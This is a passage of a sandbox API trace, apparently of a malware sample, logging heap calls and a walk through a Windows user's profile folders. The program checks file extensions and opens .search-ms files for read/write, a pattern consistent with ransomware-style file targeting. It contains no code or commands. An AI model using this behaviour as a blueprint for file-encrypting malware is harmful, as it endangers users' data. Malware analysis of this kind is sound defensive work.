lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.278] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x9c778e8 [0059.278] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c778e8 | out: hHeap=0x660000) returned 1 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5d1d0 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.279] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5d1d0 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.279] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5d1d0 [0059.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0059.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0059.280] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0059.280] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.280] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.280] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.280] PathFindFileNameW (pszPath="") returned="" [0059.280] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x51b3c80, ftLastWriteTime.dwHighDateTime=0x1d4d509, nFileSizeHigh=0x0, nFileSizeLow=0xd9a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif", cAlternateFileName="Y_DZ9Y~1.GIF")) returned 0xffffffff [0059.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.280] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.280] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.280] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.280] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0059.281] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.281] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.281] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.281] PathFindFileNameW (pszPath="") returned="" [0059.281] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1126cfa0, ftCreationTime.dwHighDateTime=0x1d4c8e1, ftLastAccessTime.dwLowDateTime=0x51b3c80, ftLastAccessTime.dwHighDateTime=0x1d4d509, ftLastWriteTime.dwLowDateTime=0x51b3c80, ftLastWriteTime.dwHighDateTime=0x1d4d509, nFileSizeHigh=0x0, nFileSizeLow=0xd9a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Y_Dz9ypir.gif", cAlternateFileName="Y_DZ9Y~1.GIF")) returned 0xffffffff [0059.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32619a0 | out: hHeap=0x660000) returned 1 [0059.281] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.281] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.281] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0059.281] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.281] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.281] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.281] PathFindFileNameW (pszPath="") returned="" [0059.281] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.281] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.281] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.281] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0059.281] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned=".ini" [0059.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.282] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0059.282] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.282] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.282] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0059.282] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.282] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.282] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.282] PathFindFileNameW (pszPath="") returned="" [0059.282] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.282] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.282] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0059.282] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned=".ini" [0059.282] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0059.282] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0059.282] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned=".search-ms" [0059.283] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.283] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0059.283] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned=".search-ms" [0059.283] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.283] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0059.283] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.283] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32619a0 | out: hHeap=0x660000) returned 1 [0059.283] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.283] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.283] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0059.283] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.283] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.284] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.284] PathFindFileNameW (pszPath="") returned="" [0059.284] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0059.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32619a0 | out: hHeap=0x660000) returned 1 [0059.284] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.284] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.284] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\") returned="Start Menu\\" [0059.284] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.284] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.284] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.284] PathFindFileNameW (pszPath="") returned="" [0059.284] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0059.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.284] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.284] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.284] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\") returned="Templates\\" [0059.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.285] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.285] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.285] PathFindFileNameW (pszPath="") returned="" [0059.285] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0xffffffff [0059.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0059.285] 